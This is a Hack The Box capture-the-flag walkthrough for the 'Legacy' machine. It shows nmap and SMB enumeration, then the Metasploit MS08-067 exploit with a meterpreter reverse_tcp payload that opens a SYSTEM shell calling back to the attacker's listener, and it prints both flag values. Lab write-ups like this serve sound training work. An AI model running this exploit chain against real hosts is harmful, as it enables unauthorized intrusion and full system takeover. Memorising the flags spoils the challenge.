HTB | Legacy
Walkthrough
Time to Root Machine: ~15min
Write-up Date(s): 1/12/2021
Last Edited: 1/12/2021
Since we already established connection to Hack the Box's network, we are going to start our journey with the Legacy machine [IP Address: 10.10.10.4] with a simple
Nmap scan:┌──(root💀kali)-[~] └─# nmap -p- -A -T4 10.10.10.4 7 ⚙ Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-23 12:21 EDT Nmap scan report for 10.10.10.4 Host is up (0.088s latency). Not shown: 65532 filtered ports PORT STATE SERVICE VERSION 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows XP microsoft-ds 3389/tcp closed ms-wbt-server Device type: general purpose|specialized Running (JUST GUESSING): Microsoft Windows XP|2003|2000|2008 (92%), General Dynamics embedded (89%) OS CPE: cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003 cpe:/o:microsoft:windows_2000::sp4 cpe:/o:microsoft:windows_server_2008::sp2 Aggressive OS guesses: Microsoft Windows XP SP2 or Windows Small Business Server 2003 (92%), Microsoft Windows 2000 SP4 or Windows XP SP2 or SP3 (92%), Microsoft Windows XP SP2 (91%), Microsoft Windows XP SP2 or SP3 (91%), Microsoft Windows Server 2003 (90%), Microsoft Windows XP SP3 (90%), Microsoft Windows XP Professional SP3 (90%), Microsoft Windows XP Professional SP2 (90%), Microsoft Windows 2000 SP4 (89%), Microsoft Windows XP SP2 or Windows Server 2003 (89%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp Host script results: |_clock-skew: mean: -4h25m11s, deviation: 2h07m16s, median: -5h55m11s |_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:73:d1 (VMware) | smb-os-discovery: | OS: Windows XP (Windows 2000 LAN Manager) | OS CPE: cpe:/o:microsoft:windows_xp::- | Computer name: legacy | NetBIOS computer name: LEGACY\x00 | Workgroup: HTB\x00 |_ System time: 2021-04-23T16:27:51+03:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) |_smb2-time: Protocol negotiation failed (SMB2) TRACEROUTE (using port 3389/tcp) HOP RTT ADDRESS 1 50.12 ms 10.10.16.1 2 97.48 ms 10.10.10.4 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 154.12 seconds
Nothing much happening on the port scan. We have found that the machine has an open/active
SMB [Samba] port on ports 139 & 445. Moving a little further down the nmap scan, we also see that there is a 92% chance that the host is running on Windows XP SP3, which could lead to something, as well.Even though the nmap scan did not specify anonymous SMB login, we will go ahead and attempt a quick enumeration, but not dive too deep into the rabbit hole:
┌──(root💀kali)-[~]
└─# smbclient -L //10.10.10.4/ --option='client min protocol=NT1' 7 ⚙
Enter WORKGROUP\root's password:
session setup failed: NT_STATUS_INVALID_PARAMETER
┌──(root💀kali)-[~]
└─# smbclient -L //10.10.10.4/IPC$ --option='client min protocol=NT1' 1 ⨯ 7 ⚙
Enter WORKGROUP\root's password:
session setup failed: NT_STATUS_INVALID_PARAMETER
┌──(root💀kali)-[~]
└─# smbclient -L //10.10.10.4/ADMIN$ --option='client min protocol=NT1' 1 ⨯ 7 ⚙
Enter WORKGROUP\root's password:
session setup failed: NT_STATUS_INVALID_PARAMETER
Just as expected, nothing to go off of when trying to further enumerate the SMB ports.
We can, however, try to figure out the
SMB Version that is being used on this machine, and we may be able to gather some information off of that. Let's go ahead and start up msfconsole and run the SMB Version Scanner:┌──(root💀kali)-[~]
└─# msfconsole 1 ⨯ 7 ⚙
[!] The following modules could not be loaded!..\
[!] /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/host_id.go
[!] /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/exchange_enum.go
[!] /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/onprem_enum.go
[!] Please see /root/.msf4/logs/framework.log for details.
, ,
/ \
((__---,,,---__))
(_) O O (_)_________
\ _ / |\
o_o \ M S F | \
\ _____ | *
||| WW|||
||| |||
=[ metasploit v6.0.40-dev ]
+ -- --=[ 2119 exploits - 1138 auxiliary - 360 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]
Metasploit tip: To save all commands executed since start up
to a file, use the makerc command
msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > options
Module options (auxiliary/scanner/smb/smb_version):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
THREADS 1 yes The number of concurrent threads (max one per host)
msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 10.10.10.4
RHOSTS => 10.10.10.4
msf6 auxiliary(scanner/smb/smb_version) > run
[*] 10.10.10.4:445 - SMB Detected (versions:1) (preferred dialect:) (signatures:optional)
[+] 10.10.10.4:445 - Host is running Windows XP SP3 (language:English) (name:LEGACY) (workgroup:HTB)
[*] 10.10.10.4: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Well, we didn’t get exactly what we were looking for, since we didn’t get a specific SMB version, but we did get a definite answer with what version of Windows the machine is running on, and that is
Windows XP SP3.Let’s go ahead and do a quick Google search and see if we have any exploits to go off of with Windows XP SP3:
Looks promising! Let’s go ahead and read up on the first listing, the Rapid 7 link:
I think we have struck gold! Looking at the description, it is said that
Windows XP targets seem to handle multiple successful exploitation events... Scrolling down on the Rapid 7 page for the potential exploit found, we can see that there is a simple Metasploit Module that can be used, so let’s fire up msfconsole again and run the exploit:
┌──(root💀kali)-[~]
└─# msfconsole 148 ⨯ 8 ⚙
[!] The following modules could not be loaded!../
[!] /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/host_id.go
[!] /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/exchange_enum.go
[!] /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/onprem_enum.go
[!] Please see /root/.msf4/logs/framework.log for details.
.,,. .
.\$$$$$L..,,==aaccaacc%#s$b. d8, d8P
d8P #$$$$$$$$$$$$$$$$$$$$$$$$$$$b. `BP d888888p
d888888P '7$$$$\""""''^^`` .7$$$|D*"'``` ?88'
d8bd8b.d8p d8888b ?88' d888b8b _.os#$|8*"` d8P ?8b 88P
88P`?P'?P d8b_,dP 88P d8P' ?88 .oaS###S*"` d8P d8888b $whi?88b 88b
d88 d8 ?8 88b 88b 88b ,88b .osS$$$$*" ?88,.d88b, d88 d8P' ?88 88P `?8b
d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"` `?88' ?88 ?88 88b d88 d88
.a#$$$$$$"` 88b d8P 88b`?8888P'
,s$$$$$$$"` 888888P' 88n _.,,,ass;:
.a$$$$$$$P` d88P' .,.ass%#S$$$$$$$$$$$$$$'
.a$###$$$P` _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$'
,a$$###$$P` _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS'
.a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$'
_______________________________________________________________ ,&$$$$$$'_____
ll&&$$$$'
.;;lll&&&&'
...;;lllll&'
......;;;llll;;;....
` ......;;;;... . .
=[ metasploit v6.0.40-dev ]
+ -- --=[ 2119 exploits - 1138 auxiliary - 360 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]
Metasploit tip: View all productivity tips with the
tips command
msf6 > use exploit/windows/smb/ms08_067_netapi
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf6 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 10.10.10.4
RHOSTS => 10.10.10.4
msf6 exploit(windows/smb/ms08_067_netapi) > set LHOST tun0
LHOST => tun0
msf6 exploit(windows/smb/ms08_067_netapi) > run
[*] Started reverse TCP handler on 10.10.16.159:4444
[*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175174 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.16.159:4444 -> 10.10.10.4:1028) at 2021-04-23 12:33:51 -0400Excellent! We got a
meterpreter shell up and running on 10.10.10.4!Let's see who we are on the machine and what we can access. If we are Admin, we are all set:
meterpreter > getuid Server username: NT AUTHORITY\SYSTEM
Wow, that was quick and painless. Looks like we are
NT AUTHORITY\SYSTEM, or in other words, Windows Admin!Last thing to do is grab those flags:
meterpreter > shell
Process 1572 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32> cd ../../
cd ../../
C:\> dir
dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B
Directory of C:\
16/03/2017 08:30 �� 0 AUTOEXEC.BAT
16/03/2017 08:30 �� 0 CONFIG.SYS
16/03/2017 09:07 �� <DIR> Documents and Settings
16/03/2017 08:33 �� <DIR> Program Files
16/03/2017 08:33 �� <DIR> WINDOWS
2 File(s) 0 bytes
3 Dir(s) 6.488.244.224 bytes free
C:\> cd Documents and Settings
cd Documents and Settings
C:\Documents and Settings> dir
dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B
Directory of C:\Documents and Settings
16/03/2017 09:07 �� <DIR> .
16/03/2017 09:07 �� <DIR> ..
16/03/2017 09:07 �� <DIR> Administrator
16/03/2017 08:29 �� <DIR> All Users
16/03/2017 08:33 �� <DIR> john
0 File(s) 0 bytes
5 Dir(s) 6.488.244.224 bytes free
C:\Documents and Settings> cd Administrator
cd Administrator
C:\Documents and Settings\Administrator> dir
dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B
Directory of C:\Documents and Settings\Administrator
16/03/2017 09:07 �� <DIR> .
16/03/2017 09:07 �� <DIR> ..
16/03/2017 09:18 �� <DIR> Desktop
16/03/2017 09:07 �� <DIR> Favorites
16/03/2017 09:07 �� <DIR> My Documents
16/03/2017 08:20 �� <DIR> Start Menu
0 File(s) 0 bytes
6 Dir(s) 6.488.133.632 bytes free
C:\Documents and Settings\Administrator> cd Desktop
cd Desktop
C:\Documents and Settings\Administrator\Desktop> dir
dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B
Directory of C:\Documents and Settings\Administrator\Desktop
16/03/2017 09:18 �� <DIR> .
16/03/2017 09:18 �� <DIR> ..
16/03/2017 09:18 �� 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 6.488.072.192 bytes free
C:\Documents and Settings\Administrator\Desktop> type root.txt
type root.txt
993442d258b0e0ec917cae9e695d5713
C:\Documents and Settings\Administrator\Desktop> cd ../../
cd ../../
C:\Documents and Settings> dir
dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B
Directory of C:\Documents and Settings
16/03/2017 09:07 �� <DIR> .
16/03/2017 09:07 �� <DIR> ..
16/03/2017 09:07 �� <DIR> Administrator
16/03/2017 08:29 �� <DIR> All Users
16/03/2017 08:33 �� <DIR> john
0 File(s) 0 bytes
5 Dir(s) 6.488.068.096 bytes free
C:\Documents and Settings> cd john/Desktop
cd john/Desktop
C:\Documents and Settings\john\Desktop> dir
dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B
Directory of C:\Documents and Settings\john\Desktop
16/03/2017 09:19 �� <DIR> .
16/03/2017 09:19 �� <DIR> ..
16/03/2017 09:19 �� 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 6.467.751.936 bytes free
C:\Documents and Settings\john\Desktop> type user.txt
type user.txt
e69af0e4f443de7e36876fda4ec7644fROOT FLAG:
USER [John] FLAG:
993442d258b0e0ec917cae9e695d5713USER [John] FLAG:
e69af0e4f443de7e36876fda4ec7644f